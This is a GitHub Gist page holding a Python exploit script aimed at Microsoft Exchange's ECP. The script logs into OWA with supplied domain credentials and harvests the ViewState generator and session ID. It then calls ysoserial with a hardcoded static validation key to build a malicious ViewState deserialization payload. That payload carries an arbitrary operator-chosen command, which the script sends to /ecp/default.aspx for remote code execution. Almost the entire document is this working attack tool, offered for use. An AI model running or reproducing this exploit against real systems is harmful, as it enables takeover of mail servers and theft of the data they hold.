Created
March 30, 2020 18:50
-
-
Save exploitio/bd794ed3671ccf56c8370f82b4f2d68b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# encoding: UTF-8 | |
import requests | |
import argparse | |
import re | |
import sys | |
import os | |
import urllib3 | |
from urllib.parse import urlparse | |
from urllib.parse import quote | |
urllib3.disable_warnings() | |
ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial/" | |
session = requests.Session() | |
def get_value(url, user, pwd): | |
print("[*] Tring to login owa...") | |
tmp = urlparse(url) | |
base_url = "{}://{}".format(tmp.scheme, tmp.netloc) | |
paramsPost = { | |
"password": ""+pwd+"", | |
"isUtf8": "1", | |
"passwordText": "", | |
"trusted": "4", | |
"destination": ""+url+"", | |
"flags": "4", | |
"forcedownlevel": "0", | |
"username": ""+user+"" | |
} | |
headers = { | |
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", | |
"Upgrade-Insecure-Requests": "1", | |
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0", | |
"Connection": "close", | |
"Accept-Language": "en-US,en;q=0.5", | |
"Accept-Encoding": "gzip, deflate", | |
"Content-Type": "application/x-www-form-urlencoded", | |
"Cookie": "PrivateComputer=true; PBack=0" | |
} | |
cookies = { | |
"PBack": "0", | |
"PrivateComputer": "true" | |
} | |
login_url = base_url + '/owa/auth.owa' | |
print("[+] Login url: {}".format(login_url)) | |
try: | |
login = session.post(login_url, data=paramsPost, headers=headers, verify=False, timeout=30) | |
print("[*] Status code: %i" % login.status_code) | |
if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text: | |
print("[!] Login Incorrect, please try again with a different account..") | |
sys.exit(1) | |
except Exception as e: | |
print("[!] login error , error: {}".format(e)) | |
sys.exit(1) | |
print("[+] Login successfully! ") | |
try: | |
print("[*] Tring to get __VIEWSTATEGENERATOR...") | |
target_url = "{}/ecp/default.aspx".format(base_url) | |
new_response = session.get(target_url, verify=False, timeout=15) | |
view = re.compile( | |
'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0] | |
print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view)) | |
except: | |
view = "B97B4E27" | |
print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view)) | |
try: | |
print("[*] Tring to get ASP.NET_SessionId....") | |
key = session.cookies['ASP.NET_SessionId'] | |
print("[+] Done! ASP.NET_SessionId: {}".format(key)) | |
except Exception as e: | |
key = None | |
print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e)) | |
return view, key, base_url | |
def ysoserial(cmd): | |
cmd = ysoserial_path+cmd | |
r = os.popen(cmd) | |
res = r.readlines() | |
return res[-1] | |
def main(): | |
parser = argparse.ArgumentParser() | |
parser.add_argument("-s", "--server", required=True, help="ECP Server URL: http://ip/owa") | |
parser.add_argument("-u", "--user", required=True, help="Domain Login: domain\\user") | |
parser.add_argument("-p", "--password", required=True, help="Domain Password") | |
parser.add_argument("-c", "--cmd", help="Command to EXEC", required=True) | |
parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False) | |
args = parser.parse_args() | |
url = args.server | |
print("[*] Start to exploit..") | |
user = args.user | |
pwd = args.password | |
command = args.cmd | |
view, key, base_url = get_value(url, user, pwd) | |
if key is None: | |
key = 'test' | |
sys.exit(1) | |
ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy --isdebug""".format(command,view,key) | |
if args.encrypt: | |
ex_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted' | |
print("\n"+ex_payload) | |
out_payload = ysoserial(ex_payload) | |
if args.encrypt: | |
final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload)) | |
else: | |
final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload)) | |
print("\n[+] Exp url: {}".format(final_exp)) | |
print("\n[*] Auto trigger payload..") | |
status = session.get(final_exp,verify=False,timeout=15) | |
if status.status_code==500: | |
print("[*] Status code: %i, Maybe success!" % status.status_code) | |
if __name__ == "__main__": | |
main() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment